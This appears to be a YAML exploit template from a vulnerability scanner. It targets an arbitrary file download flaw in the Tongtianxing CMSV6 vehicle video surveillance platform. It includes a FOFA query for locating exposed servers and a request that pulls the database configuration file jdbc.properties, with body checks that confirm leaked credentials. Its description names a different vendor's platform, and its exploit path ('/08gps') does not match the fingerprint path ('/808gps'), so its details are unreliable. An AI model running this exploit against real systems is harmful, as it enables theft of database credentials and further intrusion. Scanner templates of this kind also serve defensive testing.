product: 通天星CMSV6车载视频监控平台
vName: 通天星CMSV6车载视频监控平台 任意文件下载
type: 文件读取
vID: [ ]
level: 3
vDesc: 深圳市强鸿电子有限公司鸿运主动安全云平台存在任意文件下载漏洞，攻击者可通过此漏洞下载敏感文件信息，获取数据库账号密码，从而为下一步攻击做准备。
version: ''
note: ''
search:
  FOFA: body="/808gps/images/favicon.ico"
protocol: http
link: https://blog.csdn.net/CommputerMac/article/details/133781783
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /08gps/MobileAction_downLoad.response?path=/WEB-INF/classes/config/jdbc.properties
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - DATABASE
            logic: and
        - body:
            value:
              - jdbc.
            logic: and